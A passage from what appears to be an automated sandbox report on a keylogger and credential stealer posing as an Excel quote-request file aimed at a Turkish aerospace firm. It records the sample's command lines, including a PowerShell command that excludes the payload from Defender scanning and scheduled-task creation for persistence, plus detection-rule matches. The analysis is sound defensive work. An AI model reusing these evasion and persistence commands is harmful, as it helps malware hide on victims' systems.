Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:13:58
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:13:58
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:13:58
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp"
Imagebase:	0xb20000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:13:58
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exePID: 5964, Parent PID: 2248

General

Target ID:	9
Start time:	08:13:59
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Imagebase:	0x1c0000
File size:	757'760 bytes
MD5 hash:	C9C012589D85D3610541A5C7377D5AC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exePID: 5728, Parent PID: 2248

General

Target ID:	10
Start time:	08:13:59
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Imagebase:	0xbf0000
File size:	757'760 bytes
MD5 hash:	C9C012589D85D3610541A5C7377D5AC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	08:13:59
Start date:	14/01/2025
Path:	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe
Imagebase:	0xf80000
File size:	757'760 bytes
MD5 hash:	C9C012589D85D3610541A5C7377D5AC9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2226842794.000000000342A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs Detection: 36%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:14:01
Start date:	14/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:14:03
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp387E.tmp"
Imagebase:	0xb20000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:14:03
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:14:03
Start date:	14/01/2025
Path:	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe"
Imagebase:	0xca0000
File size:	757'760 bytes
MD5 hash:	C9C012589D85D3610541A5C7377D5AC9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3379471851.0000000000437000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exePID: 2248, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.3%
Total number of Nodes:	372
Total number of Limit Nodes:	11

Executed Functions

Function 05636C78 Relevance: .6, Instructions: 580COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943190.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5630000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ea7be8fd5fcb0ce21b22e4a990c25ccef0bec0e83893d4d638ba1f02e0e8e0
Instruction ID: 08fe3d2375f1b49ff82aa6e2716c9bc10e5eb49727a4ce3d672e083ae12b74bc
Opcode Fuzzy Hash: 74ea7be8fd5fcb0ce21b22e4a990c25ccef0bec0e83893d4d638ba1f02e0e8e0
Instruction Fuzzy Hash: A552C334A10219CFDB14EFA8C894ADDBBB2FF89304F1181A9D509AB364DB71AD85CF51

Function 05636C68 Relevance: .6, Instructions: 575COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943190.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5630000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227460bdfe52ac21499997dcc6d6b49158ef44d5a3e292ac227cdc3138a90137
Instruction ID: d0d771787c61916761d3122be9c48eda201ef1678da0490665e5bb9de244b5b0
Opcode Fuzzy Hash: 227460bdfe52ac21499997dcc6d6b49158ef44d5a3e292ac227cdc3138a90137
Instruction Fuzzy Hash: 9942C334A10219CFDB14EF68C894B9DBBB2FF89304F1181A9D509AB364EB71AD85CF51

Function 09166020 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a82d45e1dde3672387830690e5785634dd3a530f0887c9254b186defe964e1
Instruction ID: f801c3ef61285f9039c2685b8a1ce5d8f156d9c15d47d84cede5a57af7842fd0
Opcode Fuzzy Hash: 33a82d45e1dde3672387830690e5785634dd3a530f0887c9254b186defe964e1
Instruction Fuzzy Hash: 2EC1D174E04228CFDB18CFA9C8447AEFBF2BF89344F14916AD408A7265DB309995CF50

Function 0916600F Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b0b01aec6b57c75208e67516317d0fc26f7df4c60eb67f8decabf0b62e222d
Instruction ID: 05fe116fa0a4f9699529476ba282f5eff2c13d6dabe2d21dac455b784366e745
Opcode Fuzzy Hash: 28b0b01aec6b57c75208e67516317d0fc26f7df4c60eb67f8decabf0b62e222d
Instruction Fuzzy Hash: 48C1DF74E04228CFDB18CFAAC8447AEBBF2BF89344F14916AD408A7265DB349995CF51

Function 02F87018 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2181884141.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82770a3bdc805092cf8f1619ac3cfc4ee1dfbe4b74a262cac633c58bf7a10db9
Instruction ID: 1deacd28d031a7dd36151a1420121e774ed1c423b663946f8f81637f8c2d874a
Opcode Fuzzy Hash: 82770a3bdc805092cf8f1619ac3cfc4ee1dfbe4b74a262cac633c58bf7a10db9
Instruction Fuzzy Hash: 79818074E00208DFDB14DFAAD984A9DBBF2FF88300F208129D519AB355DB746945CF50

Function 02F84204 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2181884141.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 188e5aa9c7467f38d1357c7261edd530980793e6e43b8d320d81b3d524398c41
Instruction ID: 37cc4f681322eb35728d8939debc871bb657197ea743646c51cb5a77efbd4e50
Opcode Fuzzy Hash: 188e5aa9c7467f38d1357c7261edd530980793e6e43b8d320d81b3d524398c41
Instruction Fuzzy Hash: 1C817074E00209DFDB54DFAAD984AADBBF2FF88300F208129E919AB355DB746945CF50

Function 07A80E48 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2188975268.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bec47988223bb0a952cc23f308c49ae9167cf571299a33707b2453dad414e28
Instruction ID: 5a88e0cbebf6729f010b1c2aed46543547c157808503abe54fa2152183c4da86
Opcode Fuzzy Hash: 7bec47988223bb0a952cc23f308c49ae9167cf571299a33707b2453dad414e28
Instruction Fuzzy Hash: 9F5129B5D1920CCBDB84EFA5D5847EEBBF9AF4A300F10A02AD42AB7251D734594ACB40

Function 07A80E38 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2188975268.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3c95536a34d41e53a3617b46d2a172a276ed4d6d41371f11c55121b3041e15
Instruction ID: 4729bdd961205f64b99c5987db4310375ac319f05a06a5efcee1405dd7f5f76c
Opcode Fuzzy Hash: 6b3c95536a34d41e53a3617b46d2a172a276ed4d6d41371f11c55121b3041e15
Instruction Fuzzy Hash: 89512CB5D1920CCBDB84EFA5D5847EEBBF5AF4A300F10A02AD42AB7251D734994ACF40

Function 07A8340E Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2188975268.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29849c10c933392d596e06258a363268a581aa1da046c845ddc9bd157123c089
Instruction ID: b796b7711be910eec348f8abae130a14171682301796a4414b7883d846dd5d23
Opcode Fuzzy Hash: 29849c10c933392d596e06258a363268a581aa1da046c845ddc9bd157123c089
Instruction Fuzzy Hash: EEE086B881E7C5DFCB80FB6468542E4BF785B07640F451585C4A9AB253D62045448B16

Function 07A80006 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 267
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07A80276

Strings

5XX, xrefs: 07A8007B
5XX, xrefs: 07A800AA

Memory Dump Source

Source File: 00000000.00000002.2188975268.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateProcess
String ID: 5XX$5XX
API String ID: 963392458-3963834598
Opcode ID: 36d515599ddb86d2ac684a974a9d0c959b3ae309f106ae4826d9b708db422f36
Instruction ID: 18abaafd51bb4a4051f66aa82005d651729fb25ec5e44a6795dd669b69b4e7f8
Opcode Fuzzy Hash: 36d515599ddb86d2ac684a974a9d0c959b3ae309f106ae4826d9b708db422f36
Instruction Fuzzy Hash: BEA179B1D0031ADFDB54DF68CD4179EBBB2AF44310F0485AAE868A7250DB749989CF91

Function 07A80040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07A80276

Strings

5XX, xrefs: 07A8007B
5XX, xrefs: 07A800AA

Memory Dump Source

Source File: 00000000.00000002.2188975268.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateProcess
String ID: 5XX$5XX
API String ID: 963392458-3963834598
Opcode ID: ce83e05822699956f235b0782fa2640a2bb14f6fb43c3213b16979df52f4b0d5
Instruction ID: 15f4efc54db3b742feacebe985312c1d27023fc5ff18c45091f9743163ee9e9d
Opcode Fuzzy Hash: ce83e05822699956f235b0782fa2640a2bb14f6fb43c3213b16979df52f4b0d5
Instruction Fuzzy Hash: D7915CB1D0021ADFDF64DFA9CD4079EBBB2BF48310F148569E828A7240DB759989CF91

Function 02F8B3C1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02F8B626

Strings

5XX, xrefs: 02F8B5DF

Memory Dump Source

Source File: 00000000.00000002.2181884141.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: HandleModule
String ID: 5XX
API String ID: 4139908857-2543615521
Opcode ID: f092b7cbceb710084f9514f4abbe161f88fc6c4e011c462c6830f557e6c5b966
Instruction ID: 0a3379b82d3259268dd8350f44a3cbc594afd90648f605ddf13370dd784b6863
Opcode Fuzzy Hash: f092b7cbceb710084f9514f4abbe161f88fc6c4e011c462c6830f557e6c5b966
Instruction Fuzzy Hash: A0812370A00B058FDB24EF29D5457AABBF1BF88344F108A2ED58AD7B50DB74E805CB95

Function 02F8590C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02F859C9

Strings

5XX, xrefs: 02F8594C

Memory Dump Source

Source File: 00000000.00000002.2181884141.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Create
String ID: 5XX
API String ID: 2289755597-2543615521
Opcode ID: f2241ff072adfba20f87da19c3c2f7d2d028e2ae66cb39875604aa8ec8976723
Instruction ID: 6c65171b7123fa0db3dfb5cd03219edb0de356ddf5e50f16a1dbb03c32613d7d
Opcode Fuzzy Hash: f2241ff072adfba20f87da19c3c2f7d2d028e2ae66cb39875604aa8ec8976723
Instruction Fuzzy Hash: FF41FFB1C00719CBEF24DFA9C9847DDBBB5BF48704F60806AC508AB251DBB5A945CF90

Function 02F844F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02F859C9

Strings

5XX, xrefs: 02F8594C

Memory Dump Source

Source File: 00000000.00000002.2181884141.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Create
String ID: 5XX
API String ID: 2289755597-2543615521
Opcode ID: 8e9355d2250a1ebd2ca086e65743ec7dffaefc107b75aa9c9239906fe52cdfc0
Instruction ID: 6b722170b919e25df15764ec6a11eb83a57c1b625f8a270cfc29fa82e74abb50
Opcode Fuzzy Hash: 8e9355d2250a1ebd2ca086e65743ec7dffaefc107b75aa9c9239906fe52cdfc0
Instruction Fuzzy Hash: 6841C070C0071DCBEB24DFA9C9847DEBBB5BF48704F60806AD508AB251DBB5A945CF90

Function 05634160 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05634221

Strings

5XX, xrefs: 05634177

Memory Dump Source

Source File: 00000000.00000002.2185943190.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5630000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CallProcWindow
String ID: 5XX
API String ID: 2714655100-2543615521
Opcode ID: dd71a54d0bb635201679210fb847115d52d7117caf01cec52481aa56a8f4c206
Instruction ID: 6ecc0ed23f5c35336e574ebed5ceb0e426c874a76ffd6f592b5e79f0a2b4d27e
Opcode Fuzzy Hash: dd71a54d0bb635201679210fb847115d52d7117caf01cec52481aa56a8f4c206
Instruction Fuzzy Hash: 7B4127B9900309CFDB54CF99C449AAAFBF5FF88314F248559D519AB321DB74A841CFA0

Function 056AC040 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,056AD3FD,?,?), ref: 056AD4AF

Strings

5XX, xrefs: 056AD43D

Memory Dump Source

Source File: 00000000.00000002.2186252010.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: DrawText
String ID: 5XX
API String ID: 2175133113-2543615521
Opcode ID: e87d387a4399e55aeabdebbffff3459104726890aa9e3d8f51792623dac72175
Instruction ID: 286ef1b897038663a91ad73206ab739732cce38c07c92578885ea654e7729eb4
Opcode Fuzzy Hash: e87d387a4399e55aeabdebbffff3459104726890aa9e3d8f51792623dac72175
Instruction Fuzzy Hash: E23102B69043099FDB10CFAAD8846DEBBF4FB58320F14842AE919A7710D774A944CFA0

Function 056AD410 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,056AD3FD,?,?), ref: 056AD4AF

Strings

5XX, xrefs: 056AD43D

Memory Dump Source

Source File: 00000000.00000002.2186252010.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: DrawText
String ID: 5XX
API String ID: 2175133113-2543615521
Opcode ID: 523e41cdc189de3c0739b8e17b2012ea96411b9b240a7d39ff2e24a11aab909f
Instruction ID: 3e8f97b7764e039b35fccce824b7fb487719d0a7ffca5c3acdb052457e8bf503
Opcode Fuzzy Hash: 523e41cdc189de3c0739b8e17b2012ea96411b9b240a7d39ff2e24a11aab909f
Instruction Fuzzy Hash: 5331C3B6D002099FDB10CF9AD884ADEFBF5FB48320F14842AE919A7710D774A954CFA0

Function 056AC04C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,056AD3FD,?,?), ref: 056AD4AF

Strings

5XX, xrefs: 056AD43D

Memory Dump Source

Source File: 00000000.00000002.2186252010.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: DrawText
String ID: 5XX
API String ID: 2175133113-2543615521
Opcode ID: 6f1dc2cae084dd9f60a36540755f56656d98a7125deda484b7586e9e2590801f
Instruction ID: 4c8baea462dfcf2f67a1c0d8a3f4f6bc1fa13f07fbe626571b1853677dff6342
Opcode Fuzzy Hash: 6f1dc2cae084dd9f60a36540755f56656d98a7125deda484b7586e9e2590801f
Instruction Fuzzy Hash: 7C31C4B5D042099FDB10CF9AD8846DEFBF5FB48310F14842AE919A7710D774A954CFA0

Function 0916FD58 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0916FDF0

Strings

5XX, xrefs: 0916FD7F

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: 5XX
API String ID: 3559483778-2543615521
Opcode ID: 71f6891ca125d0e62253d2593bee3cdbe8e286eef3a6744e6bed7fc72078dfe2
Instruction ID: 10bd27080c1379befa12d11d225009d11bb7dfb46db872cb9e3a11d80fbd4bc2
Opcode Fuzzy Hash: 71f6891ca125d0e62253d2593bee3cdbe8e286eef3a6744e6bed7fc72078dfe2
Instruction Fuzzy Hash: 17212472D003599FDF10CFAAC881BDEBBF4BF48314F10842AE918A7240C778A951CBA4

Function 0916FD60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0916FDF0

Strings

5XX, xrefs: 0916FD7F

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: 5XX
API String ID: 3559483778-2543615521
Opcode ID: 985baf55ea8ba2d9a805198709b376698e05fa2550f5658e9e208a6062539f69
Instruction ID: 81b337ffeeb104500a3a83a5fa4c8642d91f8f687ebad1b9fb0109fb07fecabb
Opcode Fuzzy Hash: 985baf55ea8ba2d9a805198709b376698e05fa2550f5658e9e208a6062539f69
Instruction Fuzzy Hash: E8211571D003499FDB10CFA9C881BDEBBF5BF48314F10842AE919A7250C778A950CBA5

Function 02F8B3B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F8D586,?,?,?,?,?), ref: 02F8DA4F

Strings

5XX, xrefs: 02F8D9E7

Memory Dump Source

